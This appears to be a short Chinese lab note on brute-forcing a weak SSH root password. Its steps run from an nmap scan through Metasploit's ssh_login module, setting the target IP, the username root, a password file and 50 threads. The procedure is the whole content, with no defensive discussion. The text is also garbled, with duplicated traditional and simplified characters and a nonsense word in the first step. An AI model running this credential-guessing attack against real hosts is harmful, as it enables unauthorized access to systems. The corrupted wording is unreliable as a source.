目的
利用SSH弱口令漏洞屏镊,獲取目標(biāo)主機(jī)權(quán)限
原理
靶機(jī)root用戶存在弱口令漏洞,利用枚舉的方法破解目標(biāo)主機(jī)ssh服務(wù)
環(huán)境
步驟
nmap掃描 --> msfconsole --> search ssh_login --> use auxiliary/scanner/ssh/ssh_login --> show options --> set RHOST 192.168.1.3 --> set USERNAME root(指定登陸用戶名root) --> set PASS_FILE /home/passwd.txt --> set THREADS 50(設(shè)置暴力破解的線程數(shù)為50) --> run